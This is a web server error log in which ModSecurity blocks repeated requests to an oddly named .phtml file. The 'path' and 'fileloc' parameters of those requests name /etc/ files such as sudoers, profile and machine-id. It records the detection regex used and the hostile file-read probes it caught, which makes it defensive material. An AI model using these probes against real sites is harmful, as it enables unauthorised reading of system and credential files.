[Thu Mar 19 16:06:41.958766 2026] [:error] [pid 17887:tid 140411624429312] [client 57.141.18.63:60674] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQQkwaGbbGflqUZDwHgAAAM4"]
[Thu Mar 19 16:06:41.964244 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.36:60680] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQRCii7xarUs8iHYPIwAAAgI"]
[Thu Mar 19 16:06:42.165444 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.113:60688] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQvXLqtnMIWvjpaJDbQAAApI"]
[Thu Mar 19 16:06:42.823842 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.43:60694] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQuoXxyEfFpUF8f8xaQAAAUM"]
[Thu Mar 19 16:06:43.351992 2026] [:error] [pid 7545:tid 140411540502272] [client 57.141.18.78:60704] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQ38B84UptSoTJtY0cwAAAZg"]
[Thu Mar 19 16:06:48.042006 2026] [:error] [pid 21563:tid 140411741927168] [client 57.141.18.46:60816] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJSEpm7ZmxKZTM4bZpcwAAA4A"]
[Thu Mar 19 16:06:49.654542 2026] [:error] [pid 27293:tid 140411574073088] [client 57.141.18.124:60846] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJSf-YZRR_7pZ7nDKv0wAAA9Q"]
[Thu Mar 19 16:06:50.186474 2026] [:error] [pid 20435:tid 140411540502272] [client 57.141.18.100:60858] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJSpJaM1-0uhhUQJM9VQAAAJg"]
[Thu Mar 19 16:06:50.444204 2026] [:error] [pid 19655:tid 140411632822016] [client 57.141.18.13:60864] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJSk1ujooLWdUDGy751gAAAE0"]
[Thu Mar 19 16:06:50.663989 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:06:51.396700 2026] [:error] [pid 5816:tid 140411725141760] [client 57.141.18.5:60696] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJS5fmNfuxceSuAEK6TgAAAcI"]
[Thu Mar 19 16:06:54.813768 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.33:60964] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJTvu8EFLIOrSqIpvOBAAAAk0"]
[Thu Mar 19 16:06:57.064561 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.78:32786] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJUfXLqtnMIWvjpaJDeAAAApg"]
[Thu Mar 19 16:06:57.076033 2026] [:error] [pid 7545:tid 140411708356352] [client 57.141.18.81:32790] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJUX8B84UptSoTJtY0eAAAAYQ"]
[Thu Mar 19 16:06:57.079642 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.32:32792] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJUfXLqtnMIWvjpaJDeQAAAo8"]
[Thu Mar 19 16:06:59.075485 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.119:32832] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJU-oXxyEfFpUF8f8xcAAAAU8"]
[Thu Mar 19 16:07:00.256712 2026] [:error] [pid 21563:tid 140411574073088] [client 57.141.18.41:32870] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJVEpm7ZmxKZTM4bZpfAAAA5Q"]
[Thu Mar 19 16:07:02.496322 2026] [:error] [pid 5816:tid 140411649607424] [client 57.141.18.78:32912] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJVZfmNfuxceSuAEK6UQAAAcs"]
[Thu Mar 19 16:07:08.072128 2026] [:error] [pid 20435:tid 140411741927168] [client 57.141.18.44:33030] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJXJJaM1-0uhhUQJM9XQAAAIA"]
[Thu Mar 19 16:07:09.539929 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.90:33034] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJXPXLqtnMIWvjpaJDfQAAAoQ"]
[Thu Mar 19 16:07:14.123664 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.87:33176] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJYhCii7xarUs8iHYPOAAAAg0"]
[Thu Mar 19 16:07:15.137095 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:07:25.425079 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.123:33528] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJbcdf6f5d65gmYZSfogAAAtI"]
[Thu Mar 19 16:07:32.673071 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.31:33718] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJdPu8EFLIOrSqIpvODgAAAk8"]
[Thu Mar 19 16:07:35.730533 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.95:33764] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJd_XLqtnMIWvjpaJDjwAAAo8"]
[Thu Mar 19 16:07:35.731249 2026] [:error] [pid 27293:tid 140411574073088] [client 57.141.18.27:33754] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJdv-YZRR_7pZ7nDKv4wAAA9Q"]
[Thu Mar 19 16:07:37.126502 2026] [proxy_fcgi:error] [pid 20435:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58460] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:07:37.755818 2026] [:error] [pid 21563:tid 140411649607424] [client 57.141.18.49:33810] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJeUpm7ZmxKZTM4bZpkgAAA4s"]
[Thu Mar 19 16:07:39.065436 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.78:33844] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJexCii7xarUs8iHYPSAAAAgI"]
[Thu Mar 19 16:07:40.476771 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.29:33878] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJfAkwaGbbGflqUZDwMgAAAMU"]
[Thu Mar 19 16:07:41.517107 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.73:33556] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJffXLqtnMIWvjpaJDlAAAAo8"]
